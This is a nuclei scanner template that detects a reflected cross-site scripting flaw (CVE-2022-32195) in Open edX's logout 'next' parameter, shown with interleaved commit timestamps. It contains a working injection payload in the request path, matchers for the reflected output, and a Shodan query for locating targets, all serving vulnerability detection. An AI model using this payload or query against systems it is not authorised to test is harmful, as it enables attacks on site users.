nuclei-templates/http/cves/2022/CVE-2022-32195.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

id: CVE-2022-32195
2022-08-06 19:47:02 +00:00
info:
name: Open edX <2022-06-06 - Cross-Site Scripting
2022-08-06 19:47:02 +00:00
author: arafatansari
severity: medium
2022-08-06 19:47:02 +00:00
description: |
Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.
2022-08-06 19:47:02 +00:00
reference:
- https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
- https://github.com/edx
- https://nvd.nist.gov/vuln/detail/CVE-2022-32195
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-32195
cwe-id: CWE-79
cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:*
epss-score: 0.00086
2022-08-06 19:47:02 +00:00
metadata:
max-request: 1
comment: Hover the cursor on the redirect link
shodan-query: http.html:"Open edX"
2023-06-04 08:13:42 +00:00
verified: true
2022-08-06 20:15:45 +00:00
tags: cve,cve2022,openedx,xss
2022-08-06 19:47:02 +00:00
http:
2022-08-06 19:47:02 +00:00
- method: GET
path:
2022-08-06 20:15:45 +00:00
- '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
2022-08-06 19:47:02 +00:00
matchers-condition: and
matchers:
2022-08-06 20:15:45 +00:00
- type: word
part: body
words:
- '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
2022-08-06 19:47:02 +00:00
- type: word
2022-08-06 20:15:45 +00:00
part: header
2022-08-06 19:47:02 +00:00
words:
2022-08-06 20:15:45 +00:00
- text/html
- type: status
status:
- 200